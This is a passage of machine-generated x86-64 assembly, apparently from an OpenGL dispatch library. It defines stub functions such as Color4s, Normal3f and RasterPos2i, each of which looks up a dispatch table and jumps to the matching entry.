movq 264(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 264(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 264(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 264(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color4s), .-GL_PREFIX(Color4s)
.p2align 4,,15
.globl GL_PREFIX(Color4sv)
.type GL_PREFIX(Color4sv), @function
GL_PREFIX(Color4sv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 272(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 272(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 272(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 272(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color4sv), .-GL_PREFIX(Color4sv)
.p2align 4,,15
.globl GL_PREFIX(Color4ub)
.type GL_PREFIX(Color4ub), @function
GL_PREFIX(Color4ub):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 280(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 280(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 280(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 280(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color4ub), .-GL_PREFIX(Color4ub)
.p2align 4,,15
.globl GL_PREFIX(Color4ubv)
.type GL_PREFIX(Color4ubv), @function
GL_PREFIX(Color4ubv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 288(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 288(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 288(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 288(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color4ubv), .-GL_PREFIX(Color4ubv)
.p2align 4,,15
.globl GL_PREFIX(Color4ui)
.type GL_PREFIX(Color4ui), @function
GL_PREFIX(Color4ui):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 296(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 296(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 296(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 296(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color4ui), .-GL_PREFIX(Color4ui)
.p2align 4,,15
.globl GL_PREFIX(Color4uiv)
.type GL_PREFIX(Color4uiv), @function
GL_PREFIX(Color4uiv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 304(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 304(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 304(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 304(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color4uiv), .-GL_PREFIX(Color4uiv)
.p2align 4,,15
.globl GL_PREFIX(Color4us)
.type GL_PREFIX(Color4us), @function
GL_PREFIX(Color4us):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 312(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 312(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 312(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 312(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color4us), .-GL_PREFIX(Color4us)
.p2align 4,,15
.globl GL_PREFIX(Color4usv)
.type GL_PREFIX(Color4usv), @function
GL_PREFIX(Color4usv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 320(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 320(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 320(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 320(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color4usv), .-GL_PREFIX(Color4usv)
.p2align 4,,15
.globl GL_PREFIX(EdgeFlag)
.type GL_PREFIX(EdgeFlag), @function
GL_PREFIX(EdgeFlag):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 328(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 328(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 328(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 328(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EdgeFlag), .-GL_PREFIX(EdgeFlag)
.p2align 4,,15
.globl GL_PREFIX(EdgeFlagv)
.type GL_PREFIX(EdgeFlagv), @function
GL_PREFIX(EdgeFlagv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 336(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 336(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 336(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 336(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EdgeFlagv), .-GL_PREFIX(EdgeFlagv)
.p2align 4,,15
.globl GL_PREFIX(End)
.type GL_PREFIX(End), @function
GL_PREFIX(End):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 344(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 344(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 344(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 344(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(End), .-GL_PREFIX(End)
.p2align 4,,15
.globl GL_PREFIX(Indexd)
.type GL_PREFIX(Indexd), @function
GL_PREFIX(Indexd):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 352(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $8, %rsp
movq %xmm0, (%rsp)
call _x86_64_get_dispatch@PLT
movq (%rsp), %xmm0
addq $8, %rsp
movq 352(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 352(%rax), %r11
jmp *%r11
1:
subq $8, %rsp
movq %xmm0, (%rsp)
call _glapi_get_dispatch
movq (%rsp), %xmm0
addq $8, %rsp
movq 352(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Indexd), .-GL_PREFIX(Indexd)
.p2align 4,,15
.globl GL_PREFIX(Indexdv)
.type GL_PREFIX(Indexdv), @function
GL_PREFIX(Indexdv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 360(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 360(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 360(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 360(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Indexdv), .-GL_PREFIX(Indexdv)
.p2align 4,,15
.globl GL_PREFIX(Indexf)
.type GL_PREFIX(Indexf), @function
GL_PREFIX(Indexf):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 368(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $8, %rsp
movq %xmm0, (%rsp)
call _x86_64_get_dispatch@PLT
movq (%rsp), %xmm0
addq $8, %rsp
movq 368(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 368(%rax), %r11
jmp *%r11
1:
subq $8, %rsp
movq %xmm0, (%rsp)
call _glapi_get_dispatch
movq (%rsp), %xmm0
addq $8, %rsp
movq 368(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Indexf), .-GL_PREFIX(Indexf)
.p2align 4,,15
.globl GL_PREFIX(Indexfv)
.type GL_PREFIX(Indexfv), @function
GL_PREFIX(Indexfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 376(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 376(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 376(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 376(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Indexfv), .-GL_PREFIX(Indexfv)
.p2align 4,,15
.globl GL_PREFIX(Indexi)
.type GL_PREFIX(Indexi), @function
GL_PREFIX(Indexi):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 384(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 384(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 384(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 384(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Indexi), .-GL_PREFIX(Indexi)
.p2align 4,,15
.globl GL_PREFIX(Indexiv)
.type GL_PREFIX(Indexiv), @function
GL_PREFIX(Indexiv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 392(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 392(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 392(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 392(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Indexiv), .-GL_PREFIX(Indexiv)
.p2align 4,,15
.globl GL_PREFIX(Indexs)
.type GL_PREFIX(Indexs), @function
GL_PREFIX(Indexs):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 400(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 400(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 400(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 400(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Indexs), .-GL_PREFIX(Indexs)
.p2align 4,,15
.globl GL_PREFIX(Indexsv)
.type GL_PREFIX(Indexsv), @function
GL_PREFIX(Indexsv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 408(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 408(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 408(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 408(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Indexsv), .-GL_PREFIX(Indexsv)
.p2align 4,,15
.globl GL_PREFIX(Normal3b)
.type GL_PREFIX(Normal3b), @function
GL_PREFIX(Normal3b):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 416(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 416(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 416(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 416(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Normal3b), .-GL_PREFIX(Normal3b)
.p2align 4,,15
.globl GL_PREFIX(Normal3bv)
.type GL_PREFIX(Normal3bv), @function
GL_PREFIX(Normal3bv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 424(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 424(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 424(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 424(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Normal3bv), .-GL_PREFIX(Normal3bv)
.p2align 4,,15
.globl GL_PREFIX(Normal3d)
.type GL_PREFIX(Normal3d), @function
GL_PREFIX(Normal3d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 432(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 432(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 432(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 432(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Normal3d), .-GL_PREFIX(Normal3d)
.p2align 4,,15
.globl GL_PREFIX(Normal3dv)
.type GL_PREFIX(Normal3dv), @function
GL_PREFIX(Normal3dv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 440(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 440(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 440(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 440(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Normal3dv), .-GL_PREFIX(Normal3dv)
.p2align 4,,15
.globl GL_PREFIX(Normal3f)
.type GL_PREFIX(Normal3f), @function
GL_PREFIX(Normal3f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 448(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 448(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 448(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 448(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Normal3f), .-GL_PREFIX(Normal3f)
.p2align 4,,15
.globl GL_PREFIX(Normal3fv)
.type GL_PREFIX(Normal3fv), @function
GL_PREFIX(Normal3fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 456(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 456(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 456(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 456(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Normal3fv), .-GL_PREFIX(Normal3fv)
.p2align 4,,15
.globl GL_PREFIX(Normal3i)
.type GL_PREFIX(Normal3i), @function
GL_PREFIX(Normal3i):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 464(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 464(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 464(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 464(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Normal3i), .-GL_PREFIX(Normal3i)
.p2align 4,,15
.globl GL_PREFIX(Normal3iv)
.type GL_PREFIX(Normal3iv), @function
GL_PREFIX(Normal3iv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 472(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 472(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 472(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 472(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Normal3iv), .-GL_PREFIX(Normal3iv)
.p2align 4,,15
.globl GL_PREFIX(Normal3s)
.type GL_PREFIX(Normal3s), @function
GL_PREFIX(Normal3s):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 480(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 480(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 480(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 480(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Normal3s), .-GL_PREFIX(Normal3s)
.p2align 4,,15
.globl GL_PREFIX(Normal3sv)
.type GL_PREFIX(Normal3sv), @function
GL_PREFIX(Normal3sv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 488(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 488(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 488(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 488(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Normal3sv), .-GL_PREFIX(Normal3sv)
.p2align 4,,15
.globl GL_PREFIX(RasterPos2d)
.type GL_PREFIX(RasterPos2d), @function
GL_PREFIX(RasterPos2d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 496(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 496(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 496(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 496(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos2d), .-GL_PREFIX(RasterPos2d)
.p2align 4,,15
.globl GL_PREFIX(RasterPos2dv)
.type GL_PREFIX(RasterPos2dv), @function
GL_PREFIX(RasterPos2dv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 504(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 504(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 504(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 504(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos2dv), .-GL_PREFIX(RasterPos2dv)
.p2align 4,,15
.globl GL_PREFIX(RasterPos2f)
.type GL_PREFIX(RasterPos2f), @function
GL_PREFIX(RasterPos2f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 512(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 512(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 512(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 512(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos2f), .-GL_PREFIX(RasterPos2f)
.p2align 4,,15
.globl GL_PREFIX(RasterPos2fv)
.type GL_PREFIX(RasterPos2fv), @function
GL_PREFIX(RasterPos2fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 520(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 520(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 520(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 520(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos2fv), .-GL_PREFIX(RasterPos2fv)
.p2align 4,,15
.globl GL_PREFIX(RasterPos2i)
.type GL_PREFIX(RasterPos2i), @function
GL_PREFIX(RasterPos2i):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 528(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 528(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 528(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 528(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos2i), .-GL_PREFIX(RasterPos2i)
.p2align 4,,15
.globl GL_PREFIX(RasterPos2iv)
.type GL_PREFIX(RasterPos2iv), @function
GL_PREFIX(RasterPos2iv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 536(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 536(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 536(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 536(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos2iv), .-GL_PREFIX(RasterPos2iv)
.p2align 4,,15
.globl GL_PREFIX(RasterPos2s)
.type GL_PREFIX(RasterPos2s), @function
GL_PREFIX(RasterPos2s):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 544(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 544(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 544(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 544(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos2s), .-GL_PREFIX(RasterPos2s)
.p2align 4,,15
.globl GL_PREFIX(RasterPos2sv)
.type GL_PREFIX(RasterPos2sv), @function
GL_PREFIX(RasterPos2sv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 552(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 552(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 552(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 552(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos2sv), .-GL_PREFIX(RasterPos2sv)
.p2align 4,,15
.globl GL_PREFIX(RasterPos3d)
.type GL_PREFIX(RasterPos3d), @function
GL_PREFIX(RasterPos3d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 560(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
